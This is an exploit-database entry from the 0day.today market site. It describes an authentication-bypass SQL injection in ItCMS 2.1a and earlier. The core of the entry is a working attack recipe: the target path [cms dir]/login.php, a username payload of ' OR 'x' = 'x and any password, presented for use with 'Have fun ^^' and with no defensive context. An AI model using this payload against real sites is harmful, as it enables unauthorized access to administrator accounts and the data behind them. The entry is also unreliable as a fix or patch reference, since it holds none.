[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ItCMS <= 2.1a (Auth Bypass) SQL Injection Vulnerability

Author
certaindeath
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4614
Category
web applications
Date add
06-01-2009
Platform
unsorted
=======================================================
ItCMS <= 2.1a (Auth Bypass) SQL Injection Vulnerability
=======================================================


--+++~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+++--
--+++~~~~~ IT!CMS <= vers. SQL Injection Vulnerability ~~~~~+++--
--+++~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+++--
[+] Discovered by: certaindeath
[+] Exploit: simple SQL injection
[+] Path: [cms dir]/login.php
[+] Username: ' OR 'x' = 'x
[+] Password: anything
[+] Have fun ^^



#  0day.today [2024-12-25]  #